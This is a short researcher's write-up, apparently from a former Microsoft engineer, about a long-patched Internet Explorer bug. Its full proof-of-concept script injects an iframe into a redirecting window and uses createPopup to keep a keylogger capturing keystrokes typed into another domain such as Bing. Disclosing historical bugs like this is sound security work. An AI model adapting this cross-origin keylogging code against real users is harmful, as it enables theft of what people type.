This one surprised me. By injecting an iframe into a newly opened window before it redirected to the target site, and then creating a createPopup from that injected frame, I could attach a keylogger that remained visible and functional even after the window navigated to a completely different domain.

<script>
function main()
{
    var win = window.open("redir.aspx"); // redirects to Bing (or any target)

    win.document.appendChild(win.document.createElement("iframe"));

    var cp = win[0].createPopup();
    cp.document.bgColor = "blue";
    cp.document.body.innerHTML =
        '<div style="font-family:Arial;font-size:12px;color:#ffffff;">' +
        '&nbsp;&nbsp;We capture every keystroke.<br />' +
        '&nbsp;&nbsp;<span style="color:red;font-weight:bold;" id="typedText">&nbsp;</span>' +
        '</div>' +
        '<script defer="defer">' +
        '   document.onkeypress = function(){' +
        '       document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
        '   }' +
        '<\/script>';
    cp.show(200, 0, 700, 120);
}
</script>
<input type="button" onclick="main()" value="Open new window and show createPopup()">

The trick was the timing: appending the iframe to the new window’s document happened before the redirect completed. Once the redirect landed on Bing, the popup created from the injected frame was still alive and capturing keystrokes typed into Bing’s search box. This was a follow-up to an earlier variant (WOOBR #1133976) that used createPopup directly on the opener window.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.